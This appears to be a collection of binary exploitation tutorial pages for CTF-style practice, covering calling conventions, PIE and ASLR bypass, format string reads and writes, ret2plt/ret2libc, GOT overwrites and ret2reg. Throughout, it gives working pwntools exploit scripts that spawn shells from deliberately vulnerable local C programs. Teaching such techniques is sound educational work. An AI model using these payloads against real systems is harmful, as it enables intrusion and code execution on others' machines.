void vuln(int check, int check2, int check3) {
if(check == 0xdeadbeef && check2 == 0xdeadc0de && check3 == 0xc0ded00d) {
puts("Nice!");
} else {
puts("Not nice!");
}
}
int main() {
vuln(0xdeadbeef, 0xdeadc0de, 0xc0ded00d);
vuln(0xdeadc0de, 0x12345678, 0xabcdef10);
}
We've seen the full disassembly of an almost identical binary, so I'll only isolate the important parts.
0x080491dd 680dd0dec0 push 0xc0ded00d
0x080491e2 68dec0adde push 0xdeadc0de
0x080491e7 68efbeadde push 0xdeadbeef
0x080491ec e871ffffff call sym.vuln
[...]
0x080491f7 6810efcdab push 0xabcdef10
0x080491fc 6878563412 push 0x12345678
0x08049201 68dec0adde push 0xdeadc0de
0x08049206 e857ffffff call sym.vuln
It's just as simple - push
them in reverse order of how they're passed in. The reverse order becomes helpful when you db sym.vuln
and print out the stack.
[0x080491bf]> db sym.vuln
[0x080491bf]> dc
hit breakpoint at: 8049162
[0x08049162]> pxw @ esp
0xffb45efc 0x080491f1 0xdeadbeef 0xdeadc0de 0xc0ded00d
So it becomes quite clear how more parameters are placed on the stack:
return pointer param1 param2 param3 [...] paramN
0x00401170 ba0dd0dec0 mov edx, 0xc0ded00d
0x00401175 bedec0adde mov esi, 0xdeadc0de
0x0040117a bfefbeadde mov edi, 0xdeadbeef
0x0040117f e89effffff call sym.vuln
0x00401184 ba10efcdab mov edx, 0xabcdef10
0x00401189 be78563412 mov esi, 0x12345678
0x0040118e bfdec0adde mov edi, 0xdeadc0de
0x00401193 e88affffff call sym.vuln
So as well as rdi
, we also push to rdx
and rsi
(or, in this case, their lower 32 bits).
Just to show that it is in fact ultimately rdi
and not edi
that is used, I will alter the original one-parameter code to utilise a bigger number:
#include <stdio.h>
void vuln(long check) {
if(check == 0xdeadbeefc0ded00d) {
puts("Nice!");
}
}
int main() {
vuln(0xdeadbeefc0ded00d);
}
If you disassemble main
, you can see it disassembles to
movabs rdi, 0xdeadbeefc0ded00d
call sym.vuln
Position Independent Code
PIE stands for Position Independent Executable, which means that every time you run the file it gets loaded into a different memory address. This means you cannot hardcode values such as function addresses and gadget locations without finding out where they are.
Luckily, this does not mean it's impossible to exploit. PIE executables are based around relative rather than absolute addresses, meaning that while the locations in memory are fairly random the offsets between different parts of the binary remain constant. For example, if you know that the function main
is located 0x128
bytes in memory after the base address of the binary, and you somehow find the location of main
, you can simply subtract 0x128
from this to get the base address, and from that the addresses of everything else.
So, all we need to do is find a single address and PIE is bypassed. Where could we leak this address from?
The stack of course!
We know that the return pointer is located on the stack - and much like a canary, we can use format string (or other ways) to read the value off the stack. The value will always be a static offset away from the binary base, enabling us to completely bypass PIE!
Due to the way PIE randomisation works, the base address of a PIE executable will always end in the hexadecimal characters 000
. This is because pages are the things being randomised in memory, which have a standard size of 0x1000
. Operating Systems keep track of page tables which point to each section of memory and define the permissions for each section, similar to segmentation.
Checking the base address ends in 000
should probably be the first thing you do if your exploit is not working as you expected.
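A quick way to express that check in a script (the leak and offset here are placeholder values):
elf_leak = 0x565f01d5                 # hypothetical leaked binary address
base = elf_leak - 0x11d5              # hypothetical offset of the leaked symbol from base
assert base & 0xfff == 0, "PIE base should end in 000 - the offset is probably wrong"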
Utilising Calling Conventions
The program expects the stack to be laid out like this before executing the function:
So why don't we provide it like that? As well as the function, we also pass the return address and the parameters.
Everything after the address of flag()
will be part of the stack frame for the next function as it is expected to be there - just instead of using push
instructions we just overwrote them manually.
from pwn import *
p = process('./vuln-32')
payload = b'A' * 52 # Padding up to EIP
payload += p32(0x080491c7) # Address of flag()
payload += p32(0x0) # Return address - don't care if crashes when done
payload += p32(0xdeadc0de) # First parameter
payload += p32(0xc0ded00d) # Second parameter
log.info(p.clean())
p.sendline(payload)
log.info(p.clean())
Same logic, except we have to utilise the gadgets we talked about previously to fill the required registers (in this case rdi
and rsi
as we have two parameters).
We have to fill the registers before the function is called
from pwn import *
p = process('./vuln-64')
POP_RDI, POP_RSI_R15 = 0x4011fb, 0x4011f9
payload = b'A' * 56 # Padding
payload += p64(POP_RDI) # pop rdi; ret
payload += p64(0xdeadc0de) # value into rdi -> first param
payload += p64(POP_RSI_R15) # pop rsi; pop r15; ret
payload += p64(0xc0ded00d) # value into rsi -> second param
payload += p64(0x0) # value into r15 -> not important
payload += p64(0x40116f) # Address of flag()
payload += p64(0x0)
log.info(p.clean())
p.sendline(payload)
log.info(p.clean())
Using format string
Unlike last time, we don't get given a function. We'll have to leak it with format strings.
Everything's as we expect.
As last time, first we set everything up.
Now we just need a leak. Let's try a few offsets.
3rd one looks like a binary address, let's check the difference between the 3rd leak and the base address in radare2. Set a breakpoint somewhere after the format string leak (doesn't really matter where).
We can see the base address is 0x565ef000
and the leaked value is 0x565f01d5
. Therefore, subtracting 0x11d5 from the leaked address should give us the base of the binary. Let's leak the value and get the base address.
Now we just need to send the exploit payload.
Same deal, just 64-bit. Try it out :)
Just as we did for PIE, except this time we print the address of system.
Yup, does what we expected.
Much of this is as we did with PIE.
Note that we include the libc here - this is just another ELF
object that makes our lives easier.
Parse the address of system and calculate libc base from that (as we did with PIE):
Now we can finally ret2libc, using the libc
ELF
object to really simplify it for us:
Try it yourself :)
If you prefer, you could have changed the following payload to be more pwntoolsy:
Instead, you could do:
The benefit of this is it's (arguably) more readable, but also makes it much easier to reuse in 64-bit exploits as all the parameters are automatically resolved for you.
Exploiting PIE with a given leak
Pretty simple - we print the address of main
, which we can read and calculate the base address from. Then, using this, we can calculate the address of win()
itself.
Let's just run the script to make sure it's the right one :D
Yup, and as we expected, it prints the location of main
.
First, let's set up the script. We create an ELF
object, which becomes very useful later on, and start the process.
Now we want to take in the main
function location. To do this we can simply receive up until it (and do nothing with that) and then read it.
Now we'll use the ELF
object we created earlier and set its base address. The sym
dictionary returns the offsets of the functions from binary base until the base address is set, after which it returns the absolute address in memory.
In this case, elf.sym['main']
will return 0x11b9
; if we ran it again, it would return 0x11b9
+ the base address. So, essentially, we're subtracting the offset of main
from the address we leaked to get the base of the binary.
Now we know the base we can just call win()
.
And does it work?
Awesome!
From the leak address of main
, we were able to calculate the base address of the binary. From this we could then calculate the address of win
and call it.
And one thing I would like to point out is how simple this exploit is. Look - it's 10 lines of code, at least half of which is scaffolding and setup.
Try this for yourself first, then feel free to check the solution. Same source, same challenge.
This time around, there's no leak. You'll have to use the ret2plt technique explained previously. Feel free to have a go before looking further on.
We're going to have to leak ASLR base somehow, and the only logical way is a ret2plt. We're not struggling for space as gets()
takes in as much data as we want.
All the basic setup
Now we want to send a payload that leaks the real address of puts
. As mentioned before, calling the PLT entry of a function is the same as calling the function itself; if we point the parameter at the GOT entry, it'll print out its actual location. This is because string arguments in C are really pointers to where the string can be found, so pointing puts at the GOT entry (which we know the location of) will print out its contents - the resolved address.
But why is there a main
there? Well, if we set the return address to random jargon, we'll leak libc base but then it'll crash; if we call main
again, however, we essentially restart the binary - except we now know libc
base so this time around we can do a ret2libc.
Remember that the GOT entry won't be the only thing printed - puts
, and most functions in C, print until a null byte. This means it will keep on printing GOT addresses, but the only one we care about is the first one, so we grab the first 4 bytes and use u32()
to interpret them as a little-endian number. After that we ignore the rest of the values, as well as the Come get me
from calling main
again.
From here, we simply calculate libc base again and perform a basic ret2libc:
And bingo, we have a shell!
You know the drill - try the same thing for 64-bit. If you want, you can use pwntools' ROP capabilities - or, to make sure you understand calling conventions, be daring and do both :P
#include <stdio.h>
void vuln() {
char buffer[20];
printf("What's your name?\n");
gets(buffer);
printf("Nice to meet you ");
printf(buffer);
printf("\n");
puts("What's your message?");
gets(buffer);
}
int main() {
vuln();
return 0;
}
void win() {
puts("PIE bypassed! Great job :D");
}
$ ./vuln-32
What's your name?
%p
Nice to meet you 0xf7f6d080
What's your message?
hello
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
$ ./vuln-32
What's your name?
%p %p %p %p %p
Nice to meet you 0xf7eee080 (nil) 0x565d31d5 0xf7eb13fc 0x1
$ r2 -d -A vuln-32
Process with PID 5548 started...
= attach 5548 5548
bin.baddr 0x565ef000
[0x565f01c9]> db 0x565f0234
[0x565f01c9]> dc
What's your name?
%3$p
Nice to meet you 0x565f01d5
p.recvuntil('name?\n')
p.sendline('%3$p')
p.recvuntil('you ')
elf_leak = int(p.recvline(), 16)
elf.address = elf_leak - 0x11d5
log.success(f'PIE base: {hex(elf.address)}') # not required, but a nice check
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.recvuntil('message?\n')
p.sendline(payload)
print(p.clean().decode())
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
p.recvuntil('name?\n')
p.sendline('%3$p')
p.recvuntil('you ')
elf_leak = int(p.recvline(), 16)
elf.address = elf_leak - 0x11d5
log.success(f'PIE base: {hex(elf.address)}')
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.recvuntil('message?\n')
p.sendline(payload)
print(p.clean().decode())
#include <stdio.h>
#include <stdlib.h>
void vuln() {
char buffer[20];
printf("System is at: %lp\n", system);
gets(buffer);
}
int main() {
vuln();
return 0;
}
void win() {
puts("PIE bypassed! Great job :D");
}
$ ./vuln-32
System is at: 0xf7de5f00
from pwn import *
elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()
p.recvuntil('at: ')
system_leak = int(p.recvline(), 16)
libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')
payload = flat(
'A' * 32,
libc.sym['system'],
0x0, # return address
next(libc.search(b'/bin/sh'))
)
p.sendline(payload)
p.interactive()
from pwn import *
elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()
p.recvuntil('at: ')
system_leak = int(p.recvline(), 16)
libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')
payload = flat(
'A' * 32,
libc.sym['system'],
0x0, # return address
next(libc.search(b'/bin/sh'))
)
p.sendline(payload)
p.interactive()
payload = flat(
'A' * 32,
libc.sym['system'],
0x0, # return address
next(libc.search(b'/bin/sh'))
)
p.sendline(payload)
binsh = next(libc.search(b'/bin/sh'))
rop = ROP(libc)
rop.raw('A' * 32)
rop.system(binsh)
p.sendline(rop.chain())
#include <stdio.h>
int main() {
vuln();
return 0;
}
void vuln() {
char buffer[20];
printf("Main Function is at: %lx\n", main);
gets(buffer);
}
void win() {
puts("PIE bypassed! Great job :D");
}
$ ./vuln-32
Main Function is at: 0x5655d1b9
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
p.recvuntil('at: ')
main = int(p.recvline(), 16)
elf.address = main - elf.sym['main']
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.sendline(payload)
print(p.clean().decode('latin-1'))
[*] 'vuln-32'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process 'vuln-32': pid 4617
PIE bypassed! Great job :D
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
p.recvuntil('at: ')
main = int(p.recvline(), 16)
elf.address = main - elf.sym['main']
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.sendline(payload)
print(p.clean().decode('latin-1'))
#include <stdio.h>
void vuln() {
puts("Come get me");
char buffer[20];
gets(buffer);
}
int main() {
vuln();
return 0;
}
from pwn import *
elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()
p.recvline() # just receive the first output
payload = flat(
'A' * 32,
elf.plt['puts'],
elf.sym['main'],
elf.got['puts']
)
p.sendline(payload)
puts_leak = u32(p.recv(4))
p.recvlines(2)
libc.address = puts_leak - libc.sym['puts']
log.success(f'LIBC base: {hex(libc.address)}')
payload = flat(
'A' * 32,
libc.sym['system'],
libc.sym['exit'], # exit is not required here, it's just nicer
next(libc.search(b'/bin/sh\x00'))
)
p.sendline(payload)
p.interactive()
from pwn import *
elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()
p.recvline()
payload = flat(
'A' * 32,
elf.plt['puts'],
elf.sym['main'],
elf.got['puts']
)
p.sendline(payload)
puts_leak = u32(p.recv(4))
p.recvlines(2)
libc.address = puts_leak - libc.sym['puts']
log.success(f'LIBC base: {hex(libc.address)}')
payload = flat(
'A' * 32,
libc.sym['system'],
libc.sym['exit'],
next(libc.search(b'/bin/sh\x00'))
)
p.sendline(payload)
p.interactive()
Address Space Layout Randomisation
ASLR stands for Address Space Layout Randomisation and can, in most cases, be thought of as libc
's equivalent of PIE - every time you run a binary, libc
(and other libraries) get loaded into a different memory address.
While it's tempting to think of ASLR as libc
PIE, there is a key difference.
ASLR is a kernel protection while PIE is a binary protection. The main difference is that PIE is compiled into the binary itself, while the presence of ASLR depends completely on the environment running the binary. If I sent you a binary that I had built with ASLR disabled on my machine, it would make no difference at all if you had ASLR enabled - the libraries would still be randomised for you.
Of course, as with PIE, this means you cannot hardcode values such as function address (e.g. system
for a ret2libc).
It's tempting to think that, as with PIE, we can simply format string for a libc address and subtract a static offset from it. Sadly, we can't quite do that.
When functions finish execution, they do not get removed from memory; instead, they just get ignored and overwritten. Chances are very high that you will grab one of these remnants with the format string. Different libc versions can act very differently during execution, so a value you just grabbed may not even exist remotely, and if it does the offset will most likely be different (different libcs have different sizes and therefore different offsets between functions). It's possible to get lucky, but you shouldn't really hope that the offsets remain the same.
Instead, a more reliable way is reading the GOT entry of a specific function.
For the same reason as PIE, libc base addresses always end in the hexadecimal characters 000
.
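A hedged sketch of that idea, combining it with the format string read primitive covered later in these notes (the binary, the stack offset and the layout are all assumptions):
from pwn import *
elf = context.binary = ELF('./vuln-32')        # hypothetical non-PIE binary with a format string bug
libc = elf.libc
p = process()
payload = b'%8$s||||' + p32(elf.got['puts'])   # buffer assumed at offset 6; the appended address lands at offset 8
p.sendline(payload)
puts_addr = u32(p.recv(4))                     # first 4 bytes of the leak = runtime address of puts
libc.address = puts_addr - libc.sym['puts']
log.success(f'LIBC base: {hex(libc.address)}') # should end in 000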
Shellcode, but without the guesswork
The problem with shellcode exploits as they are is that the locations of it are questionable - wouldn't it be cool if we could control where we wrote it to?
Well, we can.
Instead of writing shellcode directly, we can instead use some ROP to take in input again - except this time, we specify the location as somewhere we control.
If you think about it, once the return pointer is popped off the stack, ESP will point at whatever is after it in memory - after all, that's the entire basis of ROP. But what if we put shellcode there?
It's a crazy idea. But remember, ESP will point there. So what if we overwrite the return pointer with a jmp esp
gadget! Once it gets popped off, ESP will point at the shellcode and thanks to the jmp esp
it will be executed!
ret2reg extends the use of jmp esp
to the use of any register that happens to point somewhere you need it to.
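As a rough sketch (the gadget address and padding are made up; you'd find a jmp esp gadget with ROPgadget or radare2):
from pwn import *
context.binary = ELF('./vuln')        # hypothetical binary with an executable stack
p = process()
JMP_ESP = 0x080491d3                  # hypothetical address of a `jmp esp` gadget
payload  = b'A' * 52                  # hypothetical padding up to the return pointer
payload += p32(JMP_ESP)               # ret pops this; ESP then points just past it
payload += asm(shellcraft.sh())       # the shellcode sits exactly where ESP points
p.sendline(payload)
p.interactive()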
Relocation Read-Only
RELRO is a protection to stop any GOT overwrites from taking place, and it does so very effectively. There are two types of RELRO, which are both easy to understand.
Partial RELRO simply moves the GOT above the program's variables, meaning you can't overflow into the GOT. This, of course, does not prevent format string overwrites.
Full RELRO makes the GOT completely read-only, so even format string exploits cannot overwrite it. This is not the default in binaries because it can make them take much longer to load, as the loader needs to resolve all the function addresses at once.
As shown in the pwntools ELF tutorial, pwntools has a host of functionality that allows you to really make your exploit dynamic. Simply setting elf.address
will automatically update all the function and symbols addresses for you, meaning you don't have to worry about using readelf
or other command line tools, but instead can receive it all dynamically.
Not to mention that the ROP capabilities are incredibly powerful as well.
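For example (the base value is made up), rebasing with elf.address looks like this:
from pwn import ELF
elf = ELF('./vuln-32')                # hypothetical PIE binary
print(hex(elf.sym['main']))           # offset of main from the binary base
elf.address = 0x565ef000              # hypothetical leaked/calculated base
print(hex(elf.sym['main']))           # now an absolute runtime address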
Reading memory off the stack
Format String is a dangerous bug that is easily exploitable. If manipulated correctly, you can leverage it to perform powerful actions such as reading from and writing to arbitrary memory locations.
In C, certain functions can take "format specifier" within strings. Let's look at an example:
int value = 1205;
printf("Decimal: %d\nFloat: %f\nHex: 0x%x", value, (double) value, value);
This prints out:
Decimal: 1205
Float: 1205.000000
Hex: 0x4b5
So, it replaced %d
with the value, %f
with the float value and %x
with the hex representation.
This is a nice way in C of formatting strings (string concatenation is quite complicated in C). Let's try printing out the same value in hex 3 times:
int value = 1205;
printf("%x %x %x", value, value, value);
As expected, we get
4b5 4b5 4b5
What happens, however, if we don't have enough arguments for all the format specifiers?
int value = 1205;
printf("%x %x %x", value);
4b5 5659b000 565981b0
Erm... what happened here?
The key here is that printf
expects as many parameters as format string specifiers, and in 32-bit it grabs these parameters from the stack. If there aren't enough parameters on the stack, it'll just grab the next values - essentially leaking values off the stack. And that's what makes it so dangerous.
Surely if it's a bug in the code, the attacker can't do much, right? Well the real issue is when C code takes user-provided input and prints it out using printf
.
#include <stdio.h>
int main(void) {
char buffer[30];
gets(buffer);
printf(buffer);
return 0;
}
If we run this normally, it works as expected:
$ ./test
yes
yes
But what happens if we input format string specifiers, such as %x
?
$ ./test
%x %x %x %x %x
f7f74080 0 5657b1c0 782573fc 20782520
It reads values off the stack and prints them out, because the developer didn't provide enough parameters for all the format string specifiers.
To print the same value 3 times, using
printf("%x %x %x", value, value, value);
gets tedious - so, there is a better way in C.
printf("%1$x %1$x %1$x", value);
The 1$
in between tells printf to use the first parameter. However, this also means that attackers can read values at an arbitrary offset from the top of the stack - say we know there is a canary at the 6th %p
- instead of sending %p %p %p %p %p %p
we can just do %6$p
. This allows us to be much more efficient.
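As a tiny sketch against the example program from above (the offset 6 is just the example value used here):
from pwn import *
p = process('./test')                 # the example binary from above
p.sendline('%6$p')                    # ask printf for the 6th "parameter" directly
print(p.clean())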
In C, when you want to use a string you use a pointer to the start of the string - this is essentially a value that represents a memory address. So when you use the %s
format specifier, it's the pointer that gets passed to it. That means instead of reading a value off the stack, you read the value at the memory address it points to.
Now this is all very interesting - if you can find a value on the stack that happens to correspond to where you want to read, that is. But what if we could specify where we want to read? Well... we can.
Let's look back at the previous program and its output:
$ ./test
%x %x %x %x %x %x
f7f74080 0 5657b1c0 782573fc 20782520 25207825
You may notice that the last two values contain the hex values of %x
. That's because we're reading the buffer. Here it's at the 4th offset - if we can write an address then point %s
at it, we can get an arbitrary read!
$ ./vuln
ABCD|%6$p
ABCD|0x44434241
As we can see, we're reading the value we inputted. Let's write a quick pwntools script that writes the location of the ELF file and reads it with %s
- if all goes well, it should read the first bytes of the file, which is always \x7fELF
. Start with the basics:
from pwn import *
p = process('./vuln')
payload = p32(0x41424344)
payload += b'|%6$p'
p.sendline(payload)
log.info(p.clean())
$ python3 exploit.py
[+] Starting local process './vuln': pid 3204
[*] b'DCBA|0x41424344'
Nice it works. The base address of the binary is 0x8048000
, so let's replace the 0x41424344
with that and read it with %s
:
from pwn import *
p = process('./vuln')
payload = p32(0x8048000)
payload += b'|%6$s'
p.sendline(payload)
log.info(p.clean())
It doesn't work.
The reason it doesn't work is that printf
stops at null bytes, and the very first character is a null byte. We have to put the format specifier first.
from pwn import *
p = process('./vuln')
payload = b'%8$p||||'
payload += p32(0x8048000)
p.sendline(payload)
log.info(p.clean())
Let's break down the payload:
We add 4 |
because we want the address we send to fill one whole stack entry, not half of one and half of another - otherwise we'd end up reading the wrong address
The offset is %8$p
because the start of the buffer is generally at %6$p
. However, memory addresses are 4 bytes long each and we already have 8 bytes, so it's two memory addresses further along at %8$p
.
$ python3 exploit.py
[+] Starting local process './vuln': pid 3255
[*] b'0x8048000||||'
It still stops at the null byte, but that's not important because we get the output; the address is still written to memory, just not printed back.
Now let's replace the p
with an s
.
$ python3 exploit.py
[+] Starting local process './vuln': pid 3326
[*] b'\x7fELF\x01\x01\x01||||'
Of course, %s
will also stop at a null byte as strings in C are terminated with them. We have worked out, however, that the first bytes of an ELF file up to a null byte are \x7fELF\x01\x01\x01
.
Luckily C contains a rarely-used format specifier %n
. This specifier takes in a pointer (memory address) and writes there the number of characters written so far. If we can control the input, we can control how many characters are written and also where we write them.
Obviously, there is a small flaw - to write, say, 0x8048000
to a memory address, we would have to write that many characters - and generally buffers aren't quite that big. Luckily there are other format string specifiers for that. I fully recommend you watch this video to completely understand it, but let's jump into a basic binary.
#include <stdio.h>
int auth = 0;
int main() {
char password[100];
puts("Password: ");
fgets(password, sizeof password, stdin);
printf(password);
printf("Auth is %i\n", auth);
if(auth == 10) {
puts("Authenticated!");
}
}
Simple - we need to overwrite the variable auth
with the value 10. Format string vulnerability is obvious, but there's also no buffer overflow due to a secure fgets
.
As it's a global variable, it's within the binary itself. We can check the location using readelf
to check for symbols.
$ readelf -s auth | grep auth
34: 00000000 0 FILE LOCAL DEFAULT ABS auth.c
57: 0804c028 4 OBJECT GLOBAL DEFAULT 24 auth
Location of auth
is 0x0804c028
.
We're lucky there are no null bytes in the address, so there's no need to change the order.
$ ./auth
Password:
%p %p %p %p %p %p %p %p %p
0x64 0xf7f9f580 0x8049199 (nil) 0x1 0xf7ff5980 0x25207025 0x70252070 0x20702520
Buffer is the 7th %p
.
from pwn import *
AUTH = 0x804c028
p = process('./auth')
payload = p32(AUTH)
payload += b'|' * 6 # We need to write the value 10, AUTH is 4 bytes, so we need 6 more for %n
payload += b'%7$n'
print(p.clean().decode('latin-1'))
p.sendline(payload)
print(p.clean().decode('latin-1'))
And easy peasy:
[+] Starting local process './auth': pid 4045
Password:
[*] Process './auth' stopped with exit code 0 (pid 4045)
(À\x04||||||
Auth is 10
Authenticated!
As you can expect, pwntools has a handy feature for automating %n
format string exploits:
payload = fmtstr_payload(offset, {location : value})
The offset
in this case is 7
because the 7th %p
read the buffer; the location is where you want to write it and the value is what. Note that you can add as many location-value pairs into the dictionary as you want.
payload = fmtstr_payload(7, {AUTH : 10})
You can also grab the location of the auth
symbol with pwntools:
elf = ELF('./auth')
AUTH = elf.sym['auth']
Check out the pwntools tutorials for more cool features
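Putting it all together, a minimal sketch of the whole exploit using these features might look like this (same offset of 7 as found above):

```python
from pwn import *

elf = context.binary = ELF('./auth')
p = process()

AUTH = elf.sym['auth']                   # 0x804c028, grabbed from the symbol table
payload = fmtstr_payload(7, {AUTH: 10})  # write 10 to auth via the 7th format string parameter

p.sendline(payload)
p.interactive()                          # should print "Authenticated!"
```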
Bypassing ASLR
The PLT and GOT are sections within an ELF file that deal with a large portion of the dynamic linking. Dynamically linked binaries are more common than statically linked binaries in CTFs. The purpose of dynamic linking is that binaries do not have to carry all the code necessary to run within them - this reduces their size substantially. Instead, they rely on system libraries (especially libc
, the C standard library) to provide the bulk of the functionality.
For example, each ELF file will not carry their own version of puts
compiled within it - it will instead dynamically link to the puts
of the system it is on. As well as smaller binary sizes, this also means the user can continually upgrade their libraries, instead of having to redownload all the binaries every time a new version comes out.
So can the binary just hardcode the addresses of the libc functions it needs? Not quite.
The problem with that approach is it would require libc
to have a constant base address, i.e. to be loaded in the same area of memory every time it's run - but remember that ASLR exists. Due to the way ASLR works, these addresses need to be resolved every time the binary is run. Enter the PLT and GOT.
The PLT (Procedure Linkage Table) and GOT (Global Offset Table) work together to perform the linking.
When you call puts()
in C and compile it as an ELF executable, it is not actually puts()
- instead, it gets compiled as puts@plt
. Check it out in GDB:
Why does it do that?
Well, as we said, it doesn't know where puts
actually is - so it jumps to the PLT entry of puts
instead. From here, puts@plt
does some very specific things:
If there is a GOT entry for puts
, it jumps to the address stored there.
If there isn't a GOT entry, it will resolve it and jump there.
The GOT is a massive table of addresses; these addresses are the actual locations in memory of the libc
functions. puts@got
, for example, will contain the address of puts
in memory. When the PLT gets called, it reads the GOT address and redirects execution there. If the address is empty, it coordinates with the ld.so
(also called the dynamic linker/loader) to get the function address and stores it in the GOT.
Well, there are two key takeaways from the above explanation:
Calling the PLT address of a function is equivalent to calling the function itself
The GOT address contains addresses of functions in libc
, and the GOT is within the binary.
The use of the first point is clear - if we have a PLT entry for a desirable libc
function, for example system
, we can just redirect execution to its PLT entry and it will be the equivalent of calling system
directly; no need to jump into libc
.
The second point is less obvious, but debatably even more important. As the GOT is part of the binary, it will always be a constant offset away from the base. Therefore, if PIE is disabled or you somehow leak the binary base, you know the exact address that contains a libc
function's address. If you perhaps have an arbitrary read, it's trivial to leak the real address of the libc
function and therefore bypass ASLR.
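As a quick illustration of the two addresses involved, pwntools will show you both the PLT stub and the GOT entry of a function (the binary name here is just an example):

```python
from pwn import *

elf = ELF('./vuln')
print(hex(elf.plt['puts']))   # puts@plt - calling this is equivalent to calling puts
print(hex(elf.got['puts']))   # the GOT entry - at runtime this *contains* the address of puts in libc
```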
There are two main ways that I (personally) exploit an arbitrary read. Note that these approaches will cause not only the GOT entry to be returned but also everything else until a null byte is reached, due to strings in C being null-terminated; make sure you only take the required number of bytes.
A ret2plt is a common technique that involves calling puts@plt
and passing the GOT entry of puts as a parameter. This causes puts
to print out its own address in libc
. You then set the return address to the function you are exploiting in order to call it again, enabling you to send a second payload now that you know where libc is.
# 32-bit ret2plt
payload = flat(
b'A' * padding,
elf.plt['puts'],
elf.symbols['main'],
elf.got['puts']
)
# 64-bit
payload = flat(
b'A' * padding,
POP_RDI,
elf.got['puts'],
elf.plt['puts'],
elf.symbols['main']
)
The format string arbitrary read has the same general theory, but it is useful when you have limited stack space or a ROP chain would alter the stack in such a way as to complicate future payloads, for example when stack pivoting.
payload = p32(elf.got['puts']) # p64() if 64-bit
payload += b'|'
payload += b'%3$s' # The third parameter points at the start of the buffer
# this part is only relevant if you need to call the function again
payload = payload.ljust(40, b'A') # 40 is the offset until you're overwriting the instruction pointer
payload += p32(elf.symbols['main'])
# Send it off...
p.recvuntil(b'|') # This is not required
puts_leak = u32(p.recv(4)) # 4 bytes because it's 32-bit
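Whichever approach you use, once you have the leak the last step is the same: subtract the symbol's offset to get the libc base. A minimal sketch, assuming puts_leak from above and that pwntools can locate the matching libc:

```python
libc = elf.libc                                   # the libc the binary is linked against
libc.address = puts_leak - libc.symbols['puts']   # runtime address minus symbol offset = libc base
log.success(f'libc base: {hex(libc.address)}')
```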
The PLT and GOT do the bulk of dynamic linking
The PLT resolves actual locations in libc
of functions you use and stores them in the GOT
Next time that function is called, it jumps to the GOT and resumes execution there
Calling function@plt
is equivalent to calling the function itself
An arbitrary read enables you to read the GOT and thus bypass ASLR by calculating libc
base
Hijacking functions
You may remember that the GOT stores the actual locations in libc
of functions. Well, if we could overwrite an entry, we could gain code execution that way. Imagine the following code:
Not only is there a buffer overflow and format string vulnerability here, but say we used that format string to overwrite the GOT entry of printf
with the location of system
. The code would essentially look like the following:
Bit of an issue? Yes. Our input is being passed directly to system
.
The very simplest of possible GOT-overwrite binaries.
Infinite loop which takes in your input and prints it out to you using printf
- no buffer overflow, just format string. Let's assume ASLR is disabled - have a go yourself :)
As per usual, set it all up
Now, to do the %n
overwrite, we need to find the offset until we start reading the buffer.
Looks like it's the 5th.
Yes it is!
Now, next time printf
gets called on your input it'll actually be system
!
If the buffer is restrictive, you can always send /bin/sh
to get you into a shell and run longer commands.
You'll never guess. That's right! You can do this one by yourself.
If you want an additional challenge, re-enable ASLR and do the 32-bit and 64-bit exploits again; you'll have to leverage what we've covered previously.
Super standard binary.
Let's get all the basic setup done.
Now we're going to do something interesting - we are going to call gets
again. Most importantly, we will tell gets
to write the data it receives to a section of the binary. We need somewhere both readable and writeable, so I choose the GOT. We pass a GOT entry to gets
, and when it receives the shellcode we send it will write the shellcode into the GOT. Now we know exactly where the shellcode is. To top it all off, we set the return address of our call to gets
to where we wrote the shellcode, perfectly executing what we just inputted.
I wonder what you could do with this.
No need to worry about ASLR! Neither the stack nor libc is used, save for the ROP.
The real problem would be if PIE was enabled, as then you couldn't call gets
as the location of the PLT would be unknown without a leak - same problem with writing to the GOT.
Thanks to some members of the HackTheBox Discord server, I found out that the GOT often has executable permissions simply because those are the default permissions when there's no NX. If you have a more recent kernel, such as 5.9.0
, the default is changed and the GOT will not have X permissions.
As such, if your exploit is failing, run uname -r
to grab the kernel version and check if it's 5.9.0
; if it is, you'll have to find another RWX region to place your shellcode (if it exists!).
You can ignore most of it as it's mostly there to accommodate the existence of jmp rsp
- we don't actually want it called, so there's a negative if
statement.
Try to do this yourself first, using the explanation on the previous page. Remember, RSP points at the thing after the return pointer once ret
has occurred, so your shellcode goes after it.
You won't always have enough overflow - perhaps you'll only have 7 or 8 bytes. What you can do in this scenario is make the shellcode after the RIP equivalent to something like
Where 0x20
is the offset between the current value of RSP and the start of the buffer. In the buffer itself, we put the main shellcode. Let's try that!
The 10
is just a placeholder. Once we hit the pause()
, we attach with radare2 and set a breakpoint on the ret
, then continue. Once we hit it, we find the beginning of the A
string and work out the offset between that and the current value of RSP - it's 128
!
We successfully pivoted back to our shellcode - and because all our addresses are relative, it's completely reliable! ASLR beaten with pure shellcode.
This is harder with PIE as the location of jmp rsp
will change, so you might have to leak PIE base!
Interfacing directly with the kernel
A syscall is a system call, and is how the program enters the kernel in order to carry out specific tasks such as creating processes, I/O and anything else that requires kernel-level access.
Browsing the syscall table, you may notice that certain syscalls are similar to libc functions such as open()
, fork()
or read()
; this is because these functions are simply wrappers around the syscalls, making it much easier for the programmer.
On 64-bit Linux, a syscall is triggered by the syscall
instruction (on 32-bit it's int 0x80). Once it's triggered, the kernel checks the value stored in RAX - this is the syscall number, which defines what syscall gets run. As per the table, the other parameters can be stored in RDI, RSI, RDX, etc. and every parameter has a different meaning for the different syscalls.
A notable syscall is the execve
syscall, which executes the program passed to it in RDI. RSI and RDX hold argv
and envp
respectively.
This means, if there is no system()
function, we can use execve
to call /bin/sh
instead - all we have to do is pass in a pointer to /bin/sh
to RDI, and populate RSI and RDX with 0
(this is because both argv
and envp
need to be NULL
to pop a shell).
